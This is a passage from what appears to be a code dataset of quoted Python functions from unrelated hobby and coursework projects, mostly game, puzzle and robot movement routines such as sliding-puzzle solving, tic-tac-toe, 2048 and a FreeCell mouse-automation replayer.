(p1==1) and (p2==0): \n redo = True\n # Can this position be redone\n redo1 = gredo(x1,y1,x,y,par0) \n # Moving to P1 (P1 worse than P0) \n if (b1==0) and redo1: \n newx,newy = x1,y1\n # Can't redo P1, or P1 better than P0, move another step ahead \n else: \n newx,newy = x1,y1\n redo = False\n skip = True # don't fit this one \n\n # Only P2 has been visited before, THIS SHOULD NEVER HAPPEN\n #================================ \n elif (p1==0) and (p2==1): \n print('This should never happen!!')\n import pdb; pdb.set_trace() \n\n # Both have been visited before\n #============================== \n elif (p1==1) and (p2==1):\n # Can this position be redone \n redo1 = gredo(x1,y1,x,y,par0) \n redo2 = gredo(x2,y2,x,y,par0) \n if (redo1==False) and (redo2==False): # no redo \n redo = False\n\n # P1 worse than P0, and P2 better than P0 (or no gauss) (b1==0 and b2!=0)\n #------------------------------------------------------\n if (b1==0) and (b2!=0): \n # Can redo, moving to P1 \n if redo1: \n newx,newy = x1,y1\n redo = True\n # Can't redo, increment to P1 and skip \n else: \n newx,newy = x1,y1 # to P1 \n redo = False\n skip = True\n\n # P2 worse than P0, and P1 better than P0 (or no gauss) (b1==1 and b2==0)\n #------------------------------------------------------\n elif (b1!=0) and (b2==0): \n # Can redo, moving to P2 \n if redo2: \n newx,newy = x2,y2\n redo = True\n # Can't redo, increment to P1 and skip \n else: \n newx,newy = x1,y1 # to P1 \n redo = False\n skip = True\n\n # Both worse than P0\n #-------------------\n elif (b1==0) and (b2==0): # both bad, find worst \n # Can redo either one, move to the one with the worse solution\n if redo1 and redo2:\n redo = True\n b12,dbic12 = gbetter(res1,res2)\n # Moving to P1 (P1 worse than P2) \n if (b12==1): # to P1 \n newx,newy = x1,y1\n # Moving to P2 (P2 worse than P1) \n if (b12==0): # to P2\n newx,newy = x2,y2\n\n # Can't redo P2, go to P1 \n if redo1 and (redo2==False):\n redo = True\n newx,newy = x1,y1 # to P1 \n # Can't redo P1, go to P2 \n if (redo1==False) and redo2:\n redo = True\n newx,newy = x2,y2 # to P2 \n # Can't do either, increment to P1 and skip \n if (redo1==False) and (redo2==False): \n newx,newy = x1,y1 # to P1 \n redo = False\n skip = True \n\n # Both better than P0 or both no Gaussians, increment to P1 and skip\n #-------------------------------------------------------------------\n elif (b1!=0) and (b2!=0):\n newx,newy = x1,y1 # to P1 \n redo = False\n skip = True \n\n # Shouldn't ever happen\n else:\n print('Should not happen 1')\n import pdb; pdb.set_trace()\n \n\n # Neither has been visited before, increment to P1\n #=================================================\n elif (p1==0) and (p2==0): \n # Increment to P1\n newx,newy = x1,y1\n\n # Should never happen\n else:\n print('Should not happen 2')\n import pdb; pdb.set_trace() \n \n\n # No new position determined yet, move forward to P1\n if newx is None or newy is None:\n # Increment to P1\n newx,newy = x1,y1\n\n # Getting guess\n if newx is not None and newy is not None and guesspar is None:\n guesspar,guessx,guessy = gguess(newx,newy,xr,yr,xsgn,ysgn)\n \n try:\n dumx,dumy = newx,newy\n except:\n print('problem')\n import pdb; pdb.set_trace()\n\n \n return newx,newy,guessx,guessy,guesspar,back,redo,skip,endflag", "def execute_move(self, game_state):\n # Set new location based on which ghost this is\n game_state.ghosts_pos[self.ghost_id] = self.next_move", "def execute_move(self, game_state):\n # Set new location based on which ghost this is\n game_state.ghosts_pos[self.ghost_id] = self.next_move", "def move(self, usercmd):\n newPosX = self.robot.posX\n newPosY = self.robot.posY\n logging.info(\"Avant action :: newPosX={} / newPosY={}\".\\\n format(newPosX, newPosY))\n step = 1\n cmd = usercmd[0:1]\n if (len(usercmd) != 1):\n stpStr = usercmd[1:]\n if (stpStr.isdigit()):\n step = int(stpStr)\n else:\n step = 0\n if cmd.startswith(\"E\"):\n newPosX = newPosX + step\n elif cmd.startswith(\"W\"):\n newPosX = newPosX - step\n elif cmd.startswith(\"N\"):\n newPosY = newPosY - step\n elif cmd.startswith(\"S\"):\n newPosY = newPosY + step\n elif (cmd == \"Q\"):\n #quit\n print(\"Quit\")\n return False\n logging.info(\"newPosX={} / newPosY={}\".format(newPosX, newPosY))\n oldCar = \"\"\n newCar = \"\"\n if (self.canMove(cmd, self.robot, newPosX, newPosY)):\n oldCar = self.map[newPosY][newPosX]\n logging.info(\"originalMap[{}] : {}\".format(self.robot.posY, \\\n self.originalMap[self.robot.posY]))\n if (self.originalMap[self.robot.posY][self.robot.posX] == \".\"):\n self.map[self.robot.posY][self.robot.posX] = \".\"\n else:\n self.map[self.robot.posY][self.robot.posX] = \" \"\n self.robot.posX = newPosX\n self.robot.posY = newPosY\n self.map[newPosY][newPosX] = \"X\"\n logging.info(\"self.map[{}]={}\".format(newPosY, self.map[newPosY]))\n newCar = self.map[newPosY][newPosX]\n #print(oldCar, newCar)\n if (oldCar == \"U\" and newCar == \"X\"):\n print(\"Bravo, vous avez gagné !!!!!\")\n #Quit\n return False\n return True", "def move(self, row: int, col: int, player: int):\n def addup(dict_name, invalid_set, another_invalid, locx, locy):\n if locx == locy:\n diag_name = (1,1)\n if diag_name not in invalid_set:\n dict_name[diag_name] += 1\n if dict_name[diag_name] == self.tar:\n return player\n another_invalid.add(diag_name)\n if locx == self.tar-1-locy:\n diag_name = (-1, -1)\n if diag_name not in invalid_set:\n dict_name[diag_name] += 1\n if dict_name[diag_name] == self.tar:\n return player\n another_invalid.add(diag_name)\n curcol = (locy, None)\n currow = (None, locx)\n if curcol not in invalid_set:\n dict_name[curcol] += 1\n if dict_name[curcol] == self.tar:\n return player\n another_invalid.add(curcol)\n if currow not in invalid_set:\n dict_name[currow] += 1\n if dict_name[currow] == self.tar:\n return player\n another_invalid.add(currow)\n return 0\n res = 0\n if (row, col) not in self.walked:\n if player == 1:\n res = addup(self.p1, self.invalid_1, self.invalid_2, row, col)\n if player == 2:\n res = addup(self.p2, self.invalid_2, self.invalid_1, row, col)\n self.walked.add((row, col))\n return res", "def move_invalid():\n check50.run(run_command).stdin(\"EAST\").stdout(\"Invalid command.\")", "def make_move(self):\n\n # get relavent information\n affinity = self.get_affinity()\n sample_space = self.get_game_space()\n depth_limit = self.__search_depth\n\n # run a minimax search and get the best value\n bestval = MinimaxTree.minimax(self, sample_space, affinity, depth_limit, True)\n if bestval[0] is None: bestval = ((0,6),'x', 0)\n\n # print the number of nodes expanded \n print(self.nodes_expanded)\n\n # make the move found by the search \n self.get_game_space().set_tile(bestval[0][0], bestval[0][1], affinity)", "def move(self, direction):\n command = self.DIRECTIONS[direction][\"command\"]\n mem, out = self.cpu.run_program(inputs=[command])\n status = out.pop()\n if status in (1, 2):\n self.position = Point(\n self.position.x + self.DIRECTIONS[direction][\"mask\"][0],\n self.position.y + self.DIRECTIONS[direction][\"mask\"][1]\n )\n if self.display:\n self.draw_grid()\n sleep(self.delay)\n return status", "def move(self, rel_pos):\n self.pos = (self.pos[0] + rel_pos[0] * GRID, self.pos[1] + rel_pos[1] * GRID)", "def Recharge_Method2(r, c):\n if state.loc[r] != state.pos[c] and state.pos[c] != r:\n if state.pos[c] in rv.LOCATIONS:\n alg.do_task('moveTo', r, state.pos[c])\n else:\n robot = state.pos[c]\n alg.do_command(put, robot, c)\n alg.do_task('moveTo', r, state.pos[c])\n alg.do_command(charge, r, c)", "def solve_row0_tile(self, target_col):\r\n # replace with your code\r\n assert self.row0_invariant(target_col), 'Some trouble in row0_invariant' \r\n whole_move = ''\r\n #current_position = self.current_position(0, target_col)\r\n current_row, current_col = self.current_position(0, target_col)\r\n # print self.get_number(current_row, current_col)\r\n zero_row, zero_col = 0, target_col\r\n # print 'Target tile position=',self.current_position(0, target_col)\r\n # print 'Target tile value=', self._grid[current_position[0]][current_position[1]]\r\n # print '0 position=', (0, target_col)\r\n # print '------------------------------------------'\r\n # print 'Recommended move ld'\r\n \r\n recomended_move = 'ld'\r\n whole_move += recomended_move\r\n zero_col -= len(filter(lambda x: x=='l', recomended_move))\r\n zero_row += len(filter(lambda x: x=='d', recomended_move))\r\n self.update_puzzle(recomended_move)\r\n # print 'Grid after move:', recomended_move\r\n # print self\r\n # print 'Updated Target tile position=',self.current_position(0, target_col)\r\n # print 'Updated 0 position=', (zero_row, zero_col)\r\n # print 'Target position =', (0, target_col)\r\n #####Case when we check if recomended move solves the tile\r\n if self.current_position(0, target_col) == (0, target_col):\r\n # print 'Congrads recomended move made great deal !!'\r\n return whole_move\r\n #####If not, we position TT to (1, target_col-1),\r\n ##### and ZEOR to (1, target_col-2)\r\n else:\r\n # print '------------------------------'\r\n # print 'After base move we are do not finde puzzle'\r\n # print 'Lets move zero towards TT'\r\n \r\n ######Moving zero tile to the target tile\r\n path_up = (zero_row - current_row) * 'u'\r\n path_side = (zero_col - current_col) * 'l'\r\n path_for_zero = path_up + path_side\r\n whole_move += path_for_zero\r\n zero_col -= len(filter(lambda x: x=='l', path_for_zero))\r\n zero_row -= len(filter(lambda x: x=='u', path_for_zero))\r\n self.update_puzzle(path_for_zero)\r\n \r\n # print 'grid after move', path_for_zero\r\n # print self\r\n # print 'Updated Target tile position=',self.current_position(0, target_col)\r\n # print 'Updated 0 position=', (zero_row, zero_col)\r\n # print 'Target position =', (0, target_col)\r\n counter = 0\r\n # print self.current_position(0, target_col) != (1, target_col-1)\r\n # print (zero_row,zero_col) != (1,target_col-2)\r\n ####POitioning TT and zero into positions that can be solvable\r\n while self.current_position(0, target_col) != (1, target_col-1) or \\\r\n (zero_row,zero_col) != (1,target_col-2):\r\n counter +=1\r\n #current_position = self.current_position(0, target_col)\r\n current_row, current_col = self.current_position(0, target_col)\r\n cyclic_moves = ''\r\n # print 'Aloha in the loop'\r\n if zero_col < current_col:\r\n # print 'ZERO tile located in the left side and down move IS NOT POSIBLE'\r\n \r\n\r\n if current_col != target_col-1 and zero_row == 0:\r\n # print 'In the upper row and we can use down cycling'\r\n cyclic_moves = 'drrul'\r\n whole_move += cyclic_moves\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n\r\n elif current_col != target_col-1:\r\n # print 'not under the target place'\r\n cyclic_moves = 'urrdl'\r\n whole_move += cyclic_moves\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n elif current_col == target_col-1:\r\n # print 'Target tile under target place'\r\n # print 'DEBUG!!!!'\r\n # print self\r\n # print zero_col, target_col\r\n if zero_col == 0 and current_col == 1:\r\n cyclic_moves = 'druld'\r\n elif zero_row == 0:\r\n cyclic_moves = 'druld'\r\n \r\n else:\r\n cyclic_moves = 'urd'\r\n whole_move += cyclic_moves\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n elif zero_row > current_row:\r\n # print 'DEBUG'\r\n # print 'TT under zero tile'\r\n cyclic_moves = 'uld'\r\n whole_move += cyclic_moves\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n # print 'Puzzle after Maded move:', cyclic_moves\r\n self.update_puzzle(cyclic_moves)\r\n # print 'Zero at home=', 'Zero col', zero_col, '== Target col - 1 is', target_col - 1\r\n # print self\r\n # print 'Loop counter =',counter\r\n \r\n if counter > 10:\r\n # print 'COUNTER break'\r\n break\r\n\r\n #####Solving using pattern 2 x 3 puzzle\r\n # print '--------------------------'\r\n # print 'Lets solve 2x3 puzzle formed recently'\r\n move2x3 = \"urdlurrdluldrruld\"\r\n whole_move += move2x3\r\n zero_col -= len(filter(lambda x: x=='l', move2x3))\r\n zero_col += len(filter(lambda x: x=='r', move2x3))\r\n zero_row += len(filter(lambda x: x=='d', move2x3))\r\n zero_row -= len(filter(lambda x: x=='u', move2x3))\r\n self.update_puzzle(move2x3)\r\n # print self\r\n assert self.row1_invariant(target_col-1), 'Some trouble in row1_invariant' \r\n return whole_move", "def move(self, board, player_mark='o'):\n # First things first, let's check if the board is full first before we\n # make a move\n full = 1\n for location in board.keys():\n if board[location] == '-':\n full = 0\n\n if not full:\n # Storm Spirit is a dumb yet aggressive AI, so he does not need to\n # check whether the opponent has created a line.\n\n # Initialize a move variable that determines the location that the\n # AI will mark.\n move = ''\n\n # Let's see if there are any potential lines that we can form,\n # then mark the location that would finish that line.\n print('Searching for potential lines...')\n move = self.find_line_attempt(board, 'x')\n\n if(move == ''):\n print('No potential lines found. Marking random location.')\n # Initialize a boolean variable that tracks whether we have\n # marked a location or not.\n marked = 0\n while not marked:\n location = random.randint(1,9)\n\n # The location will have to be empty\n if(location == 1 and board['topleft'] == '-'):\n marked = 1\n print('Marking topleft location\\n')\n elif(location == 2 and board['topcenter'] == '-'):\n marked = 1\n print('Marking topcenter location\\n')\n elif(location == 3 and board['topright'] == '-'):\n marked = 1\n print('Marking topright location\\n')\n elif(location == 4 and board['middleleft'] == '-'):\n marked = 1\n print('Marking middleleft location\\n')\n elif(location == 5 and board['middlecenter'] == '-'):\n marked = 1\n print('Marking middlecenter location\\n')\n elif(location == 6 and board['middleright'] == '-'):\n marked = 1\n print('Marking middleright location\\n')\n elif(location == 7 and board['bottomleft'] == '-'):\n marked = 1\n print('Marking bottomleft location\\n')\n elif(location == 8 and board['bottomcenter'] == '-'):\n marked = 1\n print('Marking bottomcenter location\\n')\n elif(location == 9 and board['bottomright'] == '-'):\n marked = 1\n print('Marking bottomright location\\n')\n else:\n # There are no more locations to mark, but set marked to\n # true anyway\n print('No empty spaces found! Re-rolling')\n # Mark the location chosen\n if(location == 1):\n board['topleft'] = self.mark\n elif(location == 2):\n board['topcenter'] = self.mark\n elif(location == 3):\n board['topright'] = self.mark\n elif(location == 4):\n board['middleleft'] = self.mark\n elif(location == 5):\n board['middlecenter'] = self.mark\n elif(location == 6):\n board['middleright'] = self.mark\n elif(location == 7):\n board['bottomleft'] = self.mark\n elif(location == 8):\n board['bottomcenter'] = self.mark\n elif(location == 9):\n board['bottomright'] = self.mark\n else:\n # We found a line attempt, let's mark the finishing location\n board[move] = self.mark\n print('Marked location at ' + move)", "def move(x, y, direction, board):\n\n piece_at_xy = starter.get_piece(x, y, board); # Getting necessary pieces\n\n assert piece_at_xy != '*', \"Error in swipe logic\"; # Logical debug case\n valid_direction = (direction == \"left\" or\n direction == \"right\" or\n direction == \"up\" or\n direction == \"down\");\n assert valid_direction, \"Invalid direction passed in\"; # Logical debug case\n\n # The new x and y for the current piece (adjacent's current position) are stored alongside adjacent (fewer ifs + redundant code)\n if direction == \"left\":\n adjacent = (starter.get_piece(x - 1, y, board), x - 1, y);\n elif direction == \"right\":\n adjacent = (starter.get_piece(x + 1, y, board), x + 1, y);\n elif direction == \"up\":\n adjacent = (starter.get_piece(x, y - 1, board), x, y - 1);\n elif direction == \"down\":\n adjacent = (starter.get_piece(x, y + 1, board), x, y + 1);\n\n if adjacent[0] == None: # Edge of the board case (no action taken)\n return False;\n\n elif piece_at_xy != adjacent[0] and adjacent[0] != '*': # Can't combine two numbers case (no action taken)\n return False;\n\n elif adjacent[0] == '*': # Empty spot adjacent case (recursive movement in direction)\n starter.place_piece('*', x, y, board);\n starter.place_piece(piece_at_xy, adjacent[1], adjacent[2], board);\n move(adjacent[1], adjacent[2], direction, board);\n return True;\n\n elif piece_at_xy == adjacent[0]: # Adjacent same numbers case (combine them)\n starter.place_piece('*', x, y, board);\n starter.place_piece(str(int(adjacent[0]) * 2), adjacent[1], adjacent[2], board);\n move(adjacent[1], adjacent[2], direction, board);\n return True;\n\n else:\n # Logical debug case\n assert False, \"No way you should be in here. Error in move logic\";\n\n return False;", "def move(argument, player):\n current_tile = world.tile_exists(player.location_x, player.location_y)\n if argument == \"north\":\n if world.tile_exists(player.location_x, player.location_y-1):\n new_tile = world.tile_exists(player.location_x, player.location_y-1)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x, player.location_y-1)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"south\":\n if world.tile_exists(player.location_x, player.location_y+1):\n new_tile = world.tile_exists(player.location_x, player.location_y+1)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x, player.location_y+1)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"east\":\n if world.tile_exists(player.location_x+1, player.location_y):\n new_tile = world.tile_exists(player.location_x + 1, player.location_y)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x+1, player.location_y)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"west\":\n if world.tile_exists(player.location_x-1, player.location_y):\n new_tile = world.tile_exists(player.location_x-1, player.location_y)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x-1, player.location_y)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"Movement not recognized. Specify a cardinal direction.\")\n return", "def make_move(self): \n if self.counter == 0:\n #AI makes a random move to start\n ai_move = random.randrange(0,((self.size[0] * self.size[1]) - 1)) \n \n #Number to coordinate conversion\n row = ai_move % self.size[0]\n column = ai_move % self.size[0]\n self.start_game((row, column))\n self.counter = 1\n\n if (self.board[(row, column)] == 'm'):\n #print() \"\\n\", \"First move RIP!, what are the odds...\"\n self.found_mine()\n self.gameover = 1\n \n else:\n row, column = self.find_move()\n \n #0.25 second wait \n #time.sleep(0.25)\n\n #Prints out to the terminal the move and type of move\n print(row, \",\", column)\n\n #Updates the GUI\n root.update()\n \n if (self.board[(row, column)] == 'm'):\n print(\"RIP!\") \n self.found_mine() \n self.gameover = 1\n \n elif self.board[(row, column)] == '0':\n print(\"No mines in sight\") \n self.found_space((row, column))\n\n elif self.board[(row, column)] == '1':\n print(\"There is 1 mine next to this spot\") \n self.found_border((row, column))\n else:\n print(\"There are\", self.board[(row, column)], \"mines next to this spot\") \n self.found_border((row, column))", "def solve_row1_tile(self, target_col):\r\n # replace with your code\r\n whole_move = ''\r\n if self._grid[1][target_col] != 0:\r\n # print \"DEBUG CASE WHEN ZERO IN JOPA solve_row1_tile \"\r\n \r\n # print self\r\n # print 'Solwing tile', self._grid[1][target_col]\r\n \r\n # print 'Searchind indexes of ZERO'\r\n for row in self._grid:\r\n for col in row:\r\n if col == 0:\r\n zero_row, zero_col = self._grid.index(row), row.index(col)\r\n break\r\n # print 'ZERO indexes=', (zero_row, zero_col)\r\n #####Moving zero to correct place\r\n #path_down = (1 - zero_row) * 'd'\r\n # path_left = (zero_col - target_col) * 'l'\r\n if target_col - zero_col > 0:\r\n #path_right = (target_col - zero_col) * 'r'\r\n path_of_zero = (1 - zero_row) * 'd' + (target_col - zero_col) * 'r'\r\n else:\r\n path_of_zero = (1 - zero_row) * 'd'\r\n #zero_col -= len(filter(lambda x: x=='l', path_of_zero))\r\n #zero_row -= len(filter(lambda x: x=='u', path_of_zero))\r\n zero_col += len(filter(lambda x: x=='r', path_of_zero))\r\n zero_row += len(filter(lambda x: x=='d', path_of_zero))\r\n self.update_puzzle(path_of_zero)\r\n # print 'Grid after moving ZERO to target spot'\r\n # print self\r\n whole_move += path_of_zero\r\n\r\n assert self.row1_invariant(target_col), 'Some trouble in row1_invariant' \r\n \r\n #current_row, current_col = self.current_position(1, target_col)\r\n zero_row, zero_col = 1, target_col\r\n ######Moving zero tile to the target tile\r\n #path_up = (zero_row - current_row) * 'u'\r\n #path_side = (zero_col - current_col) * 'l'\r\n path_for_zero = (zero_row - self.current_position(1, target_col)[0]) * 'u' + (zero_col - self.current_position(1, target_col)[1]) * 'l'\r\n whole_move += path_for_zero\r\n zero_col -= len(filter(lambda x: x=='l', path_for_zero))\r\n zero_row -= len(filter(lambda x: x=='u', path_for_zero))\r\n self.update_puzzle(path_for_zero)\r\n # print 'grid after move', path_for_zero\r\n # print self\r\n # print 'Updated Target tile position=',self.current_position(1, target_col)\r\n # print 'Updated 0 position=', (zero_row, zero_col)\r\n # print 'Target position =', (1, target_col)\r\n counter = 0\r\n while self.current_position(1, target_col) != \\\r\n (1, target_col) or (zero_row, zero_col) != (0, target_col):\r\n # print 'Welcome to while loop!'\r\n cyclic_moves = ''\r\n #### Case 3 if ZERO located in the left side of the target tile\r\n ### like in the owel-test case\r\n #current_position = self.current_position(1, target_col)\r\n current_col = self.current_position(1, target_col)[1]\r\n counter +=1\r\n if self.current_position(1, target_col) == \\\r\n (1, target_col):\r\n # print 'ZERO not under TT'\r\n cyclic_moves = 'ur'\r\n whole_move += cyclic_moves\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n elif zero_col < current_col and self._grid[zero_row+1][zero_col] < \\\r\n self._grid[self.current_position(1, target_col)[0]][self.current_position(1, target_col)[1]]:\r\n # print 'ZERO tile located in the left side and down move is POSIBLE'\r\n if current_col != target_col:\r\n # print 'not under the target place'\r\n cyclic_moves = 'drrul'\r\n whole_move += cyclic_moves\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n elif current_col == target_col:\r\n # print 'Target tile under target place'\r\n cyclic_moves = 'dru'\r\n whole_move += cyclic_moves\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n elif current_col != target_col and self._grid[zero_row+1][zero_col] > \\\r\n self._grid[self.current_position(1, target_col)[0]][self.current_position(1, target_col)[1]]:\r\n # print 'not under the target place'\r\n cyclic_moves = 'urrdl'\r\n whole_move += cyclic_moves\r\n zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n zero_row -= len(filter(lambda x: x=='u', cyclic_moves)) \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n # elif zero_col < current_col and self._grid[zero_row+1][zero_col] > \\\r\n # self._grid[current_position[0]][current_position[1]]:\r\n # # print 'ZERO tile located in the left side and down move IS NOT POSIBLE'\r\n # if current_col != target_col:\r\n # # print 'not under the target place'\r\n # cyclic_moves = 'urrdl'\r\n # whole_move += cyclic_moves\r\n # zero_col -= len(filter(lambda x: x=='l', cyclic_moves))\r\n # zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n # zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n # zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n # elif current_col == target_col:\r\n # # print 'Target tile under target place'\r\n # cyclic_moves = 'urd'\r\n # whole_move += cyclic_moves\r\n # zero_row += len(filter(lambda x: x=='d', cyclic_moves))\r\n # zero_row -= len(filter(lambda x: x=='u', cyclic_moves))\r\n # zero_col += len(filter(lambda x: x=='r', cyclic_moves))\r\n\r\n #cyclic_moves +='ur'\r\n # print 'Puzzle after Maded move:', cyclic_moves\r\n self.update_puzzle(cyclic_moves)\r\n # print 'Zero at home=', 'Zero col', zero_col, '== Target col - 1 is', target_col - 1\r\n # print self\r\n # print 'Loop counter =',counter\r\n if counter > 10:\r\n break\r\n return whole_move", "def execute_solution(offset_x, offset_y, moves):\n\n\t# Offsets for approximately where everything is given 1600x900 game window size\n\tbase_x = 46\n\tbase_y = 238\n\tfreecell_x = 314\n\tfreecell_y = 24\n\twidth = 128\n\theight = 30\n\tmodifier_x = 40\n\tmodifier_y = 19\n\n\t# Correct for retina display (change to 1 on conventional monitor)\n\tres_scale = 0.5\n\n\t# First, click the window\n\tpyautogui.mouseDown((offset_x + 100) * res_scale, (offset_y + 100) * res_scale, button=\"left\")\n\ttime.sleep(0.5)\n\tpyautogui.mouseUp()\n\ttime.sleep(1)\n\n\t# Now, replay the moves one by one\n\tfor move in moves:\n\t\t# which stack, how many cards down -> which stack, how many cards down\n\t\tx_pre, y_pre, x_post, y_post = move\n\n\t\t# If it's a regular stack, move to the offset\n\t\tif x_pre < 8:\n\t\t\tx_pre_final = offset_x + base_x + (width * x_pre) + modifier_x\n\t\t\ty_pre_final = offset_y + base_y + (height * y_pre) + modifier_y\n\t\t# Separate offsets for freecell\n\t\telse:\n\t\t\tx_pre_final = offset_x + freecell_x + (width * (x_pre - 8)) + modifier_x\n\t\t\ty_pre_final = offset_y + freecell_y + modifier_y\n\n\t\tif x_post < 8:\n\t\t\tx_post_final = offset_x + base_x + (width * x_post) + modifier_x\n\t\t\ty_post_final = offset_y + base_y + (height * y_post) + modifier_y\n\t\telse:\n\t\t\tx_post_final = offset_x + freecell_x + (width * (x_post - 8)) + modifier_x\n\t\t\ty_post_final = offset_y + freecell_y + modifier_y\n\n\t\tprint(\"Mouse to %d, %d -> drag to %d, %d\" % (x_pre_final, y_pre_final, x_post_final, y_post_final))\n\n\t\t# Move the mouse to the beginning place\n\t\tpyautogui.moveTo(x_pre_final * res_scale, y_pre_final * res_scale, duration = 0.25)\n\n\t\t# Click and drag to the end\n\t\tpyautogui.dragTo(x_post_final * res_scale, y_post_final * res_scale, duration = 0.25, button = \"left\")\n\n\t\t# Wait for a while\n\t\ttime.sleep(0.25)", "def moveToNext(self):\n\t\tif self.G.debug:\n\t\t\ttic=time.clock()\n\t\tself.debugPrint('looks for new spot')\n\t\texceeds=self.m.exceedsAngleLim\t#function\n\t\tinside=self.m.isWithinPlantingBorders\t#function\n\t\tcart=self.m.getCartesian\n\t\tauto=self.m.automatic\n\t\tt=self.m.times\n\t\tcommands=[]\n\t\tif self.autoMoved:\n\t\t\topt=self.pos\n\t\t\tself.autoMoved=False #if this search is unsuccessfull, automove is enabled to next ideal pos.\n\t\telse:\n\t\t\topt=self.getNextOptimal()\n\t\tmoveTo=opt #for so long..\n\t\trTemp=0.1\n\t\tthTemp=0\n\t\tb=0.05 #constant for the spiral\n\t\ta=0.1\n\t\tplant=True #we will plant in this step...\n\t\td2=self.m.plantMinDist**2 #dist^2\n\t\tpossible = False #for so long\n\t\twhile not possible:\n\t\t\ttic=time.clock()\n\t\t\tpossible=True\n\t\t\tobstList=self.G.terrain.GetVisibleObstacles(moveTo, R=self.radius)\n\t\t\ttreeList=self.G.terrain.GetTrees(moveTo, R=self.radius+self.m.plantMinDist)\n\t\t\tobstList+=[tr for tr in treeList if not tr in obstList] #this procedure minimizes R in Getobst\n\t\t\t#[p1, p2]=self.getPHCoord(moveTo)\n\t\t\tphPos=self.getPHCoord(moveTo)\n\t\t\tplantSpots=self.getPlantingCoord(moveTo)\n\t\t\t#[f1,f2]=self.getPlantingCoord(moveTo)\n\t\t\tif self.otherDevice is not None:\n\t\t\t\totherDevPlantCor=self.otherDevice.getPlantingCoord(self.otherDevice.pos)\n\t\t\t\t#check for colissions and similar related to other device\n\t\t\t\tif collide(self, self.otherDevice, o1pos=moveTo): \n\t\t\t\t\tpossible=False\n\t\t\t\telse:\n\t\t\t\t\tfor o in otherDevPlantCor:\n\t\t\t\t\t\tfor f in plantSpots:\n\t\t\t\t\t\t\t#if getDistanceSq(f1, o)<d2 or getDistanceSq(f2, o)<d2:\n\t\t\t\t\t\t\tif getDistanceSq(f,o)<d2:#plantingspot of device is closer than allowed to other Device's plantingspot\n\t\t\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t\t\tbreak\t\t\n\t\t\tif possible:\t#either 1a or angle OK and above check OK\n\t\t\t\tfor obst in obstList:\n\t\t\t\t\t#tic=time.clock()\n\t\t\t\t\tif isinstance(obst, Tree):\n\t\t\t\t\t\t#other demands, more than 1.5 m from plantingspot.\n\t\t\t \t\t\tfor f in plantSpots:\n\t\t\t\t\t\t\t#if getDistanceSq(f1, o)<d2 or getDistanceSq(f2, o)<d2:\n\t\t\t\t\t\t\tif getDistanceSq(f, obst.pos)<d2 or collide(self, obst, o1pos=moveTo):\n\t\t\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\telif isinstance(obst, Hole): #hole can be in beetween plantheads... Plantpos can be in hole.\n\t\t\t\t\t\tif len(self.plantHeads)==1: #bracke\n\t\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\telif collide(self.plantHeads[0], obst, o1pos=phPos[0]) or collide(self.plantHeads[1], obst, o1pos=phPos[1]):\n\t\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t\t#PlantingDevice.timesProf[0]+=time.clock()-tic\t\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\telif collide(self, obst, o1pos=moveTo):\n\t\t\t\t\t\tpossible=False\n\t\t\t\t\t\t#PlantingDevice.timesProf[0]+=time.clock()-tic\t\n\t\t\t\t\t\tbreak\n\t\t\t\tif possible and self.otherDevice is not None and exceeds(self, 